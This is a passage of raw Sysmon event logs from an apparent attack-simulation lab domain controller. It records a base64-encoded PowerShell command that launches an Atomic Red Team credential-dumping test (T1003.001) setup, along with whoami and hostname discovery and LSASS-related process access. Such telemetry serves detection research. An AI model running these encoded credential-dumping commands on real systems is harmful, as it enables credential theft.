1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64) 154100x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.793{D28789B6-7CCD-5FA1-D100-000000008801}4144C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCD-5FA1-D000-000000008801}5076C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CCD-5FA1-D000-000000008801}5076C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.773{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCD-5FA1-D000-000000008801}5076C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64) 154100x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.781{D28789B6-7CCD-5FA1-D000-000000008801}5076C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.413{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.413{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.382{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i1fcbikx.j2b.ps12020-11-03 15:52:45.382 10341000x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.350{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 